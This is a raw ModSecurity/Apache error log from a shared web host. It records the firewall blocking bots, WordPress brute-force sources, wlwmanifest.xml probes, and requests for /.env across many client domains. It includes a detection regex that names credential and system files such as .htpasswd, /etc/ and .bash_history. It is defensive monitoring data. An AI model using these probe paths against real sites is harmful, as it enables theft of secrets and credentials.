[Tue May 26 18:56:58.242695 2026] [security2:error] [pid 1036960:tid 1037122] [client 14.191.124.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfooGNKXNii6nttH9yZAAAAKU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1430894&moderation-hash=9f44ea2a5de14588c637934728742756
[Tue May 26 18:56:58.301939 2026] [security2:error] [pid 1036960:tid 1037128] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfoYGNKXNii6nttH9yXgAAAKs"]
[Tue May 26 18:56:58.644110 2026] [security2:error] [pid 1036960:tid 1037148] [client 216.213.29.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfooGNKXNii6nttH9yagAAAL8"], referer: https://www.anujtradingco.com/
[Tue May 26 18:57:00.279303 2026] [security2:error] [pid 1036960:tid 1037006] [remote 92.205.188.156:36092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWfpIGNKXNii6nttH9yngAAlS0"]
[Tue May 26 18:57:00.353084 2026] [security2:error] [pid 1036960:tid 1037185] [client 216.213.29.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfpIGNKXNii6nttH9ypgAAAOQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285329&moderation-hash=84542eb14c9c65a12f1eb77a892d6e15
[Tue May 26 18:57:00.540789 2026] [security2:error] [pid 1036960:tid 1037010] [remote 92.205.188.156:36092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWfpIGNKXNii6nttH9ypwAAiTE"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:57:01.219461 2026] [security2:error] [pid 1036960:tid 1037166] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfpIGNKXNii6nttH9ysgAAANE"]
[Tue May 26 18:57:03.403239 2026] [security2:error] [pid 1036960:tid 1037163] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfpoGNKXNii6nttH9zBgAAAM4"]
[Tue May 26 18:57:03.411228 2026] [security2:error] [pid 1036960:tid 1037153] [client 176.31.139.9:26394] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "glorodrc.com"] [uri "/robots.txt"] [unique_id "ahWfp4GNKXNii6nttH9zHAAAAMQ"]
[Tue May 26 18:57:03.411327 2026] [security2:error] [pid 1036960:tid 1037153] [client 176.31.139.9:26394] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "glorodrc.com"] [uri "/robots.txt"] [unique_id "ahWfp4GNKXNii6nttH9zHAAAAMQ"]
[Tue May 26 18:57:03.456536 2026] [security2:error] [pid 1036960:tid 1037035] [remote 51.75.236.153:17652] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "huronwoodphysio.com"] [uri "/robots.txt"] [unique_id "ahWfp4GNKXNii6nttH9zHQAA8ko"]
[Tue May 26 18:57:03.456737 2026] [security2:error] [pid 1036960:tid 1037199] [client 51.75.236.153:17652] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "huronwoodphysio.com"] [uri "/robots.txt"] [unique_id "ahWfp4GNKXNii6nttH9zHQAA8ko"]
[Tue May 26 18:57:03.466913 2026] [security2:error] [pid 1036960:tid 1037027] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfp4GNKXNii6nttH9zHgAAvkI"]
[Tue May 26 18:57:03.467099 2026] [security2:error] [pid 1036960:tid 1037147] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfp4GNKXNii6nttH9zHgAAvkI"]
[Tue May 26 18:57:04.034111 2026] [security2:error] [pid 1036960:tid 1037192] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfp4GNKXNii6nttH9zNwAAAOs"], referer: https://www.anujtradingco.com/
[Tue May 26 18:57:04.156244 2026] [security2:error] [pid 1036960:tid 1037190] [client 188.166.247.214:50583] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.247.166.188.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kumarindustry.svijaykumar.in"] [uri "/xmlrpc.php"] [unique_id "ahWfqIGNKXNii6nttH9zOQAAAOk"]
[Tue May 26 18:57:04.759507 2026] [security2:error] [pid 1036960:tid 1037133] [client 15.235.96.201:23656] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "glorodrc.com"] [uri "/"] [unique_id "ahWfqIGNKXNii6nttH9zVQAAALA"]
[Tue May 26 18:57:04.759640 2026] [security2:error] [pid 1036960:tid 1037133] [client 15.235.96.201:23656] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "glorodrc.com"] [uri "/"] [unique_id "ahWfqIGNKXNii6nttH9zVQAAALA"]
[Tue May 26 18:57:04.795734 2026] [security2:error] [pid 1036960:tid 1037146] [client 188.166.247.214:51734] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kumarindustry.svijaykumar.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWfqIGNKXNii6nttH9zVwAAAL0"]
[Tue May 26 18:57:04.800440 2026] [security2:error] [pid 1036960:tid 1037095] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWfqIGNKXNii6nttH9zVAAAAIo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157062&moderation-hash=c23f0f591a039229d82b3f206724dd57
[Tue May 26 18:57:04.903260 2026] [security2:error] [pid 1036960:tid 1037059] [remote 148.113.130.8:56258] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "huronwoodphysio.com"] [uri "/"] [unique_id "ahWfqIGNKXNii6nttH9zXwAA52I"]
[Tue May 26 18:57:04.903460 2026] [security2:error] [pid 1036960:tid 1037188] [client 148.113.130.8:56258] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "huronwoodphysio.com"] [uri "/"] [unique_id "ahWfqIGNKXNii6nttH9zXwAA52I"]
[Tue May 26 18:57:05.152559 2026] [security2:error] [pid 1036960:tid 1037208] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfqIGNKXNii6nttH9zUwAAAPs"]
[Tue May 26 18:57:05.532709 2026] [security2:error] [pid 1036960:tid 1037118] [client 188.166.247.214:52076] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kumarindustry.svijaykumar.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWfqYGNKXNii6nttH9zdQAAAKE"]
[Tue May 26 18:57:06.180333 2026] [security2:error] [pid 1036960:tid 1037204] [client 188.166.247.214:52357] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kumarindustry.svijaykumar.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWfqoGNKXNii6nttH9zjAAAAPc"]
[Tue May 26 18:57:06.820766 2026] [security2:error] [pid 1036960:tid 1037143] [client 188.166.247.214:52644] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kumarindustry.svijaykumar.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahWfqoGNKXNii6nttH9znwAAALo"]
[Tue May 26 18:57:06.909793 2026] [security2:error] [pid 1036960:tid 1037160] [client 149.56.160.137:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWfqoGNKXNii6nttH9zogAAAMs"]
[Tue May 26 18:57:07.266431 2026] [security2:error] [pid 1036960:tid 1037212] [client 149.56.160.137:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWfq4GNKXNii6nttH9ztQAAAP8"]
[Tue May 26 18:57:07.409141 2026] [security2:error] [pid 1036960:tid 1037101] [client 149.56.160.137:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWfq4GNKXNii6nttH9zvQAAAJA"]
[Tue May 26 18:57:07.505614 2026] [security2:error] [pid 1036960:tid 1037117] [client 188.166.247.214:52905] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kumarindustry.svijaykumar.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWfq4GNKXNii6nttH9zxQAAAKA"]
[Tue May 26 18:57:07.562272 2026] [security2:error] [pid 1036960:tid 1037148] [client 149.56.160.137:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWfq4GNKXNii6nttH9zwwAAAL8"]
[Tue May 26 18:57:07.708705 2026] [security2:error] [pid 1036960:tid 1037214] [client 149.56.160.137:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWfq4GNKXNii6nttH9z1AAAAQE"]
[Tue May 26 18:57:07.949582 2026] [security2:error] [pid 1036960:tid 1037186] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfq4GNKXNii6nttH9zywAAAOU"]
[Tue May 26 18:57:08.138741 2026] [security2:error] [pid 1036960:tid 1037178] [client 188.166.247.214:53214] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kumarindustry.svijaykumar.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahWfrIGNKXNii6nttH9z6AAAAN0"]
[Tue May 26 18:57:08.700752 2026] [security2:error] [pid 1036960:tid 1037117] [client 176.65.139.236:43794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dglmmm.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWfrIGNKXNii6nttH9z-QAAAKA"]
[Tue May 26 18:57:08.707758 2026] [security2:error] [pid 1036960:tid 1037108] [client 176.65.139.231:37016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mrgtp.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWfrIGNKXNii6nttH9z_gAAAJc"]
[Tue May 26 18:57:08.744453 2026] [security2:error] [pid 1036960:tid 1037126] [client 176.65.139.229:35514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "futurance.svijaykumar.in"] [uri "/.env"] [unique_id "ahWfrIGNKXNii6nttH9z_wAAAKk"]
[Tue May 26 18:57:08.951419 2026] [security2:error] [pid 1036960:tid 1037127] [client 188.166.247.214:53653] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kumarindustry.svijaykumar.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWfrIGNKXNii6nttH90BQAAAKo"]
[Tue May 26 18:57:09.181566 2026] [security2:error] [pid 1036960:tid 1037207] [client 45.154.98.38:55159] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWfrYGNKXNii6nttH90DQAAAPo"]
[Tue May 26 18:57:09.659343 2026] [security2:error] [pid 1036960:tid 1037200] [client 45.154.98.38:60499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pronumbers.com.au"] [uri "/xmlrpc.php"] [unique_id "ahWfrYGNKXNii6nttH90HAAAAPM"]
[Tue May 26 18:57:09.837437 2026] [security2:error] [pid 1036960:tid 1037205] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfrYGNKXNii6nttH90FwAAAPg"]
[Tue May 26 18:57:10.110928 2026] [security2:error] [pid 1036960:tid 1037177] [client 45.154.98.38:50278] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWfroGNKXNii6nttH90MQAAANw"]
[Tue May 26 18:57:10.278177 2026] [security2:error] [pid 1036960:tid 1037114] [client 176.65.139.236:43810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWfroGNKXNii6nttH90NgAAAJ0"]
[Tue May 26 18:57:10.574149 2026] [security2:error] [pid 1036960:tid 1037159] [client 45.154.98.38:59400] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWfroGNKXNii6nttH90QAAAAMo"]
[Tue May 26 18:57:10.914421 2026] [autoindex:error] [pid 1036960:tid 1037149] [client 20.89.64.143:61956] AH01276: Cannot serve directory /home2/srsglzts/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 18:57:10.993811 2026] [security2:error] [pid 1036960:tid 1037117] [client 45.154.98.38:51686] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWfroGNKXNii6nttH90UwAAAKA"]
[Tue May 26 18:57:11.288962 2026] [security2:error] [pid 1036960:tid 1037191] [client 23.106.28.178:21721] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahWfr4GNKXNii6nttH90XgAA6l8"]
[Tue May 26 18:57:11.310613 2026] [security2:error] [pid 1036960:tid 1037158] [client 45.154.98.38:57811] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWfr4GNKXNii6nttH90YwAAAMk"]
[Tue May 26 18:57:11.425709 2026] [security2:error] [pid 1036960:tid 1037164] [client 188.166.247.214:55231] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kumarindustry.svijaykumar.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWfr4GNKXNii6nttH90aAAAAM8"]
[Tue May 26 18:57:11.620692 2026] [security2:error] [pid 1036960:tid 1037196] [client 45.154.98.38:64664] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWfr4GNKXNii6nttH90bAAAAO8"]
[Tue May 26 18:57:11.930533 2026] [security2:error] [pid 1036960:tid 1037206] [client 45.154.98.38:56582] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWfr4GNKXNii6nttH90ewAAAPk"]
[Tue May 26 18:57:12.230796 2026] [security2:error] [pid 1036960:tid 1037126] [client 188.166.247.214:55696] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "kumarindustry.svijaykumar.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWfsIGNKXNii6nttH90gwAAAKk"]
[Tue May 26 18:57:12.313507 2026] [security2:error] [pid 1036960:tid 1037110] [client 45.154.98.38:58262] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWfsIGNKXNii6nttH90iQAAAJk"]
[Tue May 26 18:57:12.717483 2026] [security2:error] [pid 1036960:tid 1037154] [client 45.154.98.38:59769] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWfsIGNKXNii6nttH90kAAAAMU"]
[Tue May 26 18:57:12.732264 2026] [security2:error] [pid 1036960:tid 1037189] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfsIGNKXNii6nttH90iwAAAOg"]
[Tue May 26 18:57:13.029297 2026] [security2:error] [pid 1036960:tid 1037112] [client 45.154.98.38:51572] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWfsYGNKXNii6nttH90pAAAAJs"]
[Tue May 26 18:57:13.328439 2026] [security2:error] [pid 1036960:tid 1037143] [client 123.31.51.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfsIGNKXNii6nttH90oAAAALo"]
[Tue May 26 18:57:13.343195 2026] [security2:error] [pid 1036960:tid 1037149] [client 45.154.98.38:61464] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWfsYGNKXNii6nttH90sAAAAMA"]
[Tue May 26 18:57:13.689484 2026] [security2:error] [pid 1036960:tid 1037204] [client 45.154.98.38:53370] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWfsYGNKXNii6nttH90uwAAAPc"]
[Tue May 26 18:57:14.103063 2026] [security2:error] [pid 1036960:tid 1037192] [client 45.154.98.38:58805] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "pronumbers.com.au"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWfsoGNKXNii6nttH90xQAAAOs"]
